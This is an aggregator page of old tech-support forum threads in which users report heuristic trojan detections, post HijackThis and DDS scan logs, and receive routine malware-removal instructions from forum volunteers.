Tech Problem Aggregator

Gen:Trojan.Heur.ImKfz03..

Q: Gen:Trojan.Heur.ImKfz03..

I have a virus that's being detected & blocked by Bitdefender but it keeps on coming. It's only coming when I am connected to the Internet. Here is my HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:08:00 AM, on 12/25/2009
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v8.00 (8.00.6001.18865)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Program Files\BitDefender\BitDefender 2010\bdagent.exe
C:\Windows\system32\Dwm.exe
C:\Program Files\Dell\DellDock\DellDock.exe
C:\Program Files\PC Connectivity Solution\Transports\NclMSBTSrv.exe
C:\Program Files\BitDefender\BitDefender 2010\seccenter.exe
C:\Program Files\Dell\QuickSet\quickset.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Dell Webcam\Dell Webcam Central\WebcamDell2.exe
C:\Program Files\Sensible Vision\Fast Access\FATrayMon.exe
C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\USB Disk Security\USBGuard.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Nokia\Nokia PC Suite 7\PCSuite.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Sensible Vision\Fast Access\FATrayAlert.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\explorer.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll
O2 - BHO: FAIESSO Helper Object - {A2F122DA-055F-4df7-8F24-7354DBDBA85B} - C:\Program Files\Sensible Vision\Fast Access\FAIESSO.dll
O2 - BHO: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O3 - Toolbar: BitDefender Toolbar - {381FFDE8-2394-4f90-B10D-FC6124A40F8C} - C:\Program Files\BitDefender\BitDefender 2010\IEToolbar.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [QuickSet] C:\Program Files\Dell\QuickSet\QuickSet.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [Dell Webcam Central] "C:\Program Files\Dell Webcam\Dell Webcam Central\WebcamDell2.exe" /mode2
O4 - HKLM\..\Run: [FATrayAlert] C:\Program Files\Sensible Vision\Fast Access\FATrayMon.exe
O4 - HKLM\..\Run: [PDVDDXSrv] "C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe"
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [BitDefender Antiphishing Helper] "C:\Program Files\BitDefender\BitDefender 2010\IEShow.exe"
O4 - HKLM\..\Run: [BDAgent] "C:\Program Files\BitDefender\BitDefender 2010\bdagent.exe"
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [USB Antivirus] C:\Program Files\USB Disk Security\USBGuard.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [PWRISOVM.EXE] C:\Program Files\PowerISO\PWRISOVM.EXE
O4 - HKLM\..\Run: [UnlockerAssistant] "C:\Program Files\Unlocker\UnlockerAssistant.exe"
O4 - HKLM\..\Run: [TrojanScanner] C:\Program Files\Trojan Remover\Trjscan.exe /boot
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [Google Update] "C:\Users\Nikhil Gupta\AppData\Local\Google\Update\GoogleUpdate.exe" /c
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [PC Suite Tray] "C:\Program Files\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - Startup: Dell Dock.lnk = C:\Program Files\Dell\DellDock\DellDock.exe
O4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
O4 - Global Startup: Bluetooth.lnk = ?
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Send image to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O8 - Extra context menu item: Send page to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O13 - Gopher Prefix:
O17 - HKLM\System\CCS\Services\Tcpip\..\{8878BA5D-3BDD-414F-B71D-7FF1AEEC843A}: NameServer = 218.248.255.194 218.248.255.162
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll
O20 - Winlogon Notify: FastAccess - C:\Program Files\Sensible Vision\Fast Access\FALogNot.dll
O23 - Service: BitDefender Arrakis Server (Arrakis3) - BitDefender S.R.L. http://www.bitdefender.com - C:\Program Files\Common Files\BitDefender\BitDefender Arrakis Server\bin\arrakis3.exe
O23 - Service: Ati External Event Utility - ATI Technologies Inc. - C:\Windows\system32\Ati2evxx.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: Dock Login Service (DockLoginService) - Stardock Corporation - C:\Program Files\Dell\DellDock\DockLogin.exe
O23 - Service: FAService - Sensible Vision - C:\Program Files\Sensible Vision\Fast Access\FAService.exe
O23 - Service: BitDefender Desktop Update Service (LIVESRV) - BitDefender S.R.L. - C:\Program Files\Common Files\BitDefender\BitDefender Update Service\livesrv.exe
O23 - Service: ServiceLayer - Nokia. - C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
O23 - Service: TeamViewer 4 (TeamViewer4) - TeamViewer GmbH - C:\Program Files\TeamViewer\Version4\TeamViewer_Service.exe
O23 - Service: BitDefender Virus Shield (VSSERV) - BitDefender S.R.L. - C:\Program Files\BitDefender\BitDefender 2010\vsserv.exe

--
End of file - 8472 bytes

plz help....

A: Gen:Trojan.Heur.ImKfz03..

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not, please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order, clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:

Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif

Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Follow the instructions that pop up for posting the results.
Close the program window, and delete the program from your desktop.

Please note: You may have to disable any script protection running if the scan fails to run. After downloading the tool, disconnect from the internet and disable all antivirus protection. Run the scan, enable your A/V and reconnect to the internet.

Also, please subscribe to this topic, so you are notified when someone replies. Please continue to check manually on occasion, as every now and then the email may be caught by your spam filter.

To enable topic notifications you should do the following:
Click on the My Controls link at the top of the page to enter your control panel.
Scroll down to the Options category in the left hand side menu bar and click on the Email Settings link.
Put a checkmark in the checkbox labeled Enable 'Email Notification' by default?.
Set the If ticked, choose default type: menu option to Immediate Email Notification to have an email sent immediately when someone replies.

Information on A/V control HERE

2 more replies
Answer Match 55.44%

I keep getting a popup from Kaspersky with a Trojan quarantine in
C:\Users\Counter\AppData\Local\Google\Desktop\Install\{8976561d-a35d-8b9e-33b1-ec150b61a5be}\â¤â‰¸â‹™\Ⱒ☠â¨\‮ﯹ๛\{8976561d-a35d-8b9e-33b1-ec150b61a5be}\U\[email protected]
 
This just started all of a sudden. I have run a virus scan with Kaspersky and Malwarebytes and both come up empty. When I try to delete that directory or uninstall Google Desktop it will not let me. I get the popup warning every few minutes. I am running Windows 7.
 

A: detected: Trojan program 'HEUR:Trojan.Win32.Generic' (modification)?

Looks like it may be being protected in its location. We need a deeper look. Please follow this Preparation Guide and post in a new topic. Let me know if all went well.

1 more replies
Answer Match 55.02%

Hi guys,
 
I'm way in over my head here. I accidentally unleashed some foul demon on my computer. By being an idiot most likely. I can't re-enable my firewall and F-Secure keeps finding new vira with the names indicated in the title. Is anyone able to help me out? Anything would be immensely appreciated.
 
Best wishes,
Ragian
 
dds
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 10.0.9200.16720  BrowserJavaVersion: 10.45.2
Run by Rasmus at 13:39:51 on 2013-11-17
.
============== Running Processes ================
.
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\F-Secure\Anti-Virus\fsgk32st.exe
C:\Program Files (x86)\F-Secure\Anti-Virus\FSGK32.EXE
C:\Program Files (x86)\F-Secure\Common\FSMA32.EXE
C:\Program Files (x86)\F-Secure\Common\FSHDLL32.EXE
C:\Program Files (x86)\HTC\HTC Sync Manager\HSMServiceEntry.exe
C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe
C:\Program Files (x86)\F-Secure\ORSP Client\fsorsp.exe
C:\Program Files (x86)\F-Secure\Common\FNRB32.EXE
C:\Program Files (x86)\F-Secure\Common\FIH32.EXE
C:\Program Files (x86)\F-Secure\Anti-Virus\fssm32.exe
C:\Program Files (x86)\F-Secure\Anti-Virus\fsav32.exe
C:\Program Files (x86)\HTC\HTC Sync Manager\HTC Sync\adb.exe
C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe
C:\Program Files (x86)\Outlook on the Desktop\OutlookDesktop.exe
C:\Users\Rasmus\AppData\Roaming\Spotify\... Read more

A: heur.trojan.sirefef & trojan.generic.9819927

Hello Ragian

I would like to welcome you to the Malware Removal section of the forum. Around here they call me Gringo and I will be glad to help you with your malware problems.

Very Important --> Please read this post completely, I have spent my time to put together some things for you to keep in mind while I am helping you to make things go easier, faster and smoother for both of us!

Please do not run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.

Please do not attach logs or use code boxes, just copy and paste the text.
Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.

Please read every post completely before doing anything.
Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.

Please provide feedback about your experience as we go.
A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", ... Read more

22 more replies
Answer Match 55.02%

I bought Kaspersky just last week and I have a trojan that keeps installing itself over and over. Every time I do any scan it is always back after being deleted.

Hope someone can help. Here is my HJT Log.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 3:45:56 PM, on 12/7/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16735)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
c:\program files\common files\logitech\lvmvfm\LVPrcSrv.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2009\avp.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\Microsoft ActiveSync\wcescomm.exe
C:\PROGRA~1\MICROS~3\rapimgr.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2009\avp.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Comm... Read more

A: Trojan Kaspersky can't get rid of. HEUR:Trojan.Win32.Generic

6 more replies
Answer Match 53.76%

Constantly popping up.... IE/Firefox keeps wanting to close..... I tried to manually remove, no luck... thanks for your assistance.... much appreciated.... I'm thinking of reformatting anyway but would like to resolve the issue first.... recently downloaded eMule, not sure where these viruses came from, so if I could find out how to keep from reinstalling them after a format that would be nice.... Dell Dimension 8300, WinXP, ZoneAlarm (but would like another) lol

A: Trojan.vundo.GGI and Trojan.Heur.564E44

Hi and welcome to BleepingComputer

The process of cleaning your computer may require temporarily disabling some security programs. If you are using SpyBot Search and Destroy, please refer to Note 2 at the bottom of this page.

Please download Malwarebytes Anti-Malware and save it to your desktop.
alternate download link 1
alternate download link 2

Make sure you are connected to the Internet.
Double-click on mbam-setup.exe to install the application.
When the installation begins, follow the prompts and do not make any changes to default settings.
When installation has finished, make sure you leave both of these checked:
Update Malwarebytes' Anti-Malware
Launch Malwarebytes' Anti-Malware
Then click Finish.

MBAM will automatically start and you will be asked to update the program before performing a scan.
If an update is found, the program will automatically update itself.
Press the OK button to close that box and continue.
If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install.

On the Scanner tab:
Make sure the "Perform Quick Scan" option is selected.
Then click on the Scan button.
If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Result... Read more

6 more replies
Answer Match 52.92%

Just really sharing some info.

I recently had the Heur Trojan come up on my laptop, as the Trend Micro platinum anti virus program did not pick it up. I had scanned my system on several occasions.

Having recently changed broadband supplier, I changed to a different AV program and it picked up the trojan straightaway. I then had real problems getting the laptop and internet to function.

Tried to recover to previous restore dates - no good. The trojan basically stops you attempting to get rid of it.

Then tried to use my new AV program in safe mode. No expert on using safe mode, but if you hold the on/off button down on your PC/laptop for about 8 seconds it turns your system off, and on pushing the on button it allows you to use safe mode. In safe mode, you then log on in a safer environment. You then use the AV program that you have (hopefully a decent one) and it should, on scanning, find all the trojan files so that they are deleted. When you then log on normally, your system should be back to normal. But do run your AV program scan again to check.

Since I have done this, no problems. (fingers crossed)

A: Heur Trojan

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not, please perform the following steps below so we can have a look at the current condition of your machine.

If you are unable to create a log because your computer cannot start up successfully, please provide detailed information about the Windows version you are using: what we in particular need to know is version, edition and if it is a 32bit or a 64bit system. If you are unsure about any of these characteristics, just let us know and we'll help you figure it out. Please also tell us if you have your Windows CD/DVD handy.

Please include a clear description of the problems you're having, along with any steps you may have performed so far.

Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.

Even if you have already provided information about y... Read more

2 more replies
Answer Match 52.92%

I have Bitdefender and it detected the following virus but states that it can not remove it. Not sure if this is why my computer has been running so slow.
Gen:Trojan.Heur.1038C74242

Can anyone tell me how to remove it?

A: Gen: Trojan.heur

Hello and welcome to TSF.

We want all our members to perform the steps outlined in the link given below, before posting for assistance. There's a sticky at the top of this forum, and a

Quote:
Having problems with spyware and pop-ups? First Steps

link at the top of each page.

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

1 more replies
Answer Match 52.92%

I have run several different scans to try to rid my computer of this. There was another trojan, but I believe that one is gone.. but still have this one. Ran Kaspersky antivirus, Malwarebytes, and also Spybot. Will not go away. Anyone able to help me here?

A: Heur:Trojan

Does this concern the same computer as the topic here? http://www.bleepingcomputer.com/forums/topic434738.html

3 more replies
Answer Match 52.92%

So it took me 4 different antivirus programs to find ANYTHING wrong with my computer. BitDefender found "Trojan.heur" and I know there is something else wrong with this machine. Every time I click on a website from a search result (Google, Yahoo, everything) it takes me to a random website. I cannot access the Microsoft Update website, and I cannot update any antivirus program I have. Any help would be awesome! Here is my HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:37:36 PM, on 8/17/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16827)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\AskBarDis\bar\bin\AskService.exe
C:\Program Files\AskBarDis\bar\bin\ASKUpgrade.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\WINDOWS\system32\DVDRAMSV.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\BitDefender\BitDefender Update Service\livesrv.exe
C:\WINDOWS\ehome\ehtray.exe
C:\WINDOWS\RTHDCPL.EXE
C:\WINDOWS\AGRSMMSG.exe
C:\Program Files\TOSHIBA\ConfigFree\NDSTray.e... Read more

A: trojan.heur and something else.

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not, please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order, clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:

Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif

Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll... Read more

2 more replies
Answer Match 52.92%

Recently I was infected with the Virtumonde trojan, and I've dealt with it a few times so I knew how to remove it. I did successfully remove it (I think.. nothing is picking it up), but now I'm seeing something I've never seen before. AVG pops up a lot saying it's HEUR. What do I do?
DDS (Ver_09-02-01.01) - NTFSx86
Run by Rob at 17:49:12.14 on Mon 03/02/2009
Internet Explorer: 7.0.5730.13 BrowserJavaVersion: 1.6.0_11
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1022.233 [GMT -5:00]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated)

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
C:\WINDOWS\system32\svchost -k rpcss
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\Program Files\DigitalPersona\Bin\DPWinLct.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\Program Files\Belkin\Belkin Wireless Network Utility\WLService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program F... Read more

A: Heur trojan?

Hello Riddlerrob,

I'm afraid I have bad news for you. I see you're dealing with Virut on top of the other nasty malware on your system. In that case, it's unfortunately a lost cause - Game over situation and a format and reinstall is the fastest and especially the safest solution.

You may want to read this why: Virut and other File infectors - Throwing in the Towel?

So, I suggest you start backing up all of your valuable data/documents/pictures/movies/songs/etc.. Do NOT backup any applications/installers and Do NOT backup any .exe/.scr/.htm/.html/.xml/.zip/.rar files... This because these files may be infected as well. If you back them up and replace them afterwards, it will infect your computer again.

Read here for instructions how to format and reinstall Windows: http://web.mit.edu/ist/products/winxp/adva...all-format.html

Greetings,
Thunder

1 more replies
Answer Match 52.92%

When I click on the user icon I get a blank screen and the virus warning Trojan.heur.GZ infection, and I cannot get on the internet, but if I unplug the modem and reboot I can click on the guest icon and get on the internet. Please help.
 

A: trojan.Heur.GZ

Hello danpfander,

Welcome to TSG.

See if you can follow these instructions.

You may have used Malwarebytes before. If you have, and still have it on your machine, please update and run. Post the scan report back here.

If you do not have Malwarebytes please download from Here

Double Click mbam-setup.exe to install the application.
Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
If an update is found, it will download and install the latest version.
Once the program has loaded, select "Perform Quick Scan", then click Scan.
The scan may take some time to finish, so please be patient.
When the scan is complete, click OK, then Show Results to view the results.
Make sure that everything is checked, and click Remove Selected.
When disinfection is completed, a log will open in Notepad and you may be prompted to Restart.(See Extra Note)
The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
Copy&Paste the entire report in your next reply.
Extra Note:
If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts. Click OK to either and let MBAM proceed with the disinfection process; if asked to restart the computer, please do so immediately.

Next
Download OTL to your Desktop

Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted.
Under the Custom Scan bo... Read more

1 more replies
Answer Match 52.92%

Been having problems with my computer recently.
Used Bitdefender 2009 to perform a deep full scan and got the following results:

Gen Trojan Heur 25

C:\Program Files\HP\Quickplay\QPService.exe (memory dump)
C:\Program Files\Bitdef....Bitdefender2009\seccenter.exe (memory dump)
C:\Program Files\HP\Quickplay\Kernal\TV\CLCapSvc.exe (memory dump)
C:\Program Files\Common Files\LightScribe\LSSrvc.exe (memory dump)
C:\Program Files\HP\Quickplay\Kernal\TV\CLSched.exe (memory dump)
C:\Program Files\Windows Media Player\WMPNSCFG.exe (memory dump)
C:\Program Files\Windows Media Player\wmpnetwk.exe (memory dump)
C:\windows\system32\notepad.exe (memory dump)

I hope somebody can point me in the right direction, just got a new HD put into my PC. Thank you

A: Gen Trojan Heur 25

Hello and Welcome to TSF.

We want all our members to perform the steps outlined in the link I'll give you below, before posting for assistance. There's a sticky at the top of this forum, and a

Quote:
Having problems with spyware and pop-ups? First Steps

link at the top of each page.

------------------------------------------------------

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new thread, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Please note that the Virus/Trojan/Spyware Help forum is extremely busy, and it may take a while to receive a reply.

------------------------------------------------------

1 more replies
Answer Match 52.92%

I have the following virus on my hard drive and cannot get rid of it:
CRF2F54.TMP
Location: C\Documents and Settings\Snowy's\Local Settings\Temp\CRF2F54.TMP
Virus Name: [email protected]
Message on pop-up screen: Fatal Error 1001 and 1022

A: Trojan.heur

Hi Leonie, Sorry to hear about the virus, they are a real pain these days and can be very problematic. I know you are using Windows XP but our posting rules for viruses are as follows.

Please follow our pre-posting process outlined here:
http://www.techsupportforum.com/secu...oval-help.html

After running through all the steps, please post the requested logs in the Virus/Trojan/Spyware Help forum, not here.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Please note that the Virus/Trojan/Spyware Help forum is extremely busy, and it may take a while to receive a reply.

If you don't post the required logs, it will slow them down with getting any help.

The techs that volunteer in that section are very experienced at helping people to fix computers with a virus. It's not that I wouldn't be glad to help you, it's just that those guys will be better able to help than me.

I will continue to monitor you to make sure that you get the help you need. Please mark this thread solved using the thread tools option located at the top of this thread and selecting solved from the drop down menu, and then post at the link above, as it is against the rules to have more than one thread open at a time.


Thank you
Patmark

3 more replies

I have been trying to be very cognizant and disciplined at maintaining my security "stuff" since I got hacked back in October. I run PC Shield (aka BitDefender) as my resident, full antivirus package. Every few days, I run MalwareBytes. Every week I run Cureit.

Yesterday, PC Shield supposedly caught and blocked a Trojan - Gen:Trojan.Heur..... I thought it handled it appropriately, but when I got up this morning, the scheduled scan had picked up over 1800 files that were infected with this Gen:Trojan.Heur (with additional extensions of odd characters after ".Heur."). I went through all files and quarantined or deleted using PC Shield. Ran it again and it came up with no issues. I then tried to run Dr.Web Cureit in Safe Mode, but as happens frequently, it died and rebooted about 20 minutes into the scan. So, I ran Malwarebytes in normal mode and it showed no issues. Then, I ran SUPERAntiSpyware in Safe Mode. It came up with 2 instances of Trojan.Agent/Gen-Dropper[Temp]. I had it quarantine both issues. Now PC Shield shows clean again.

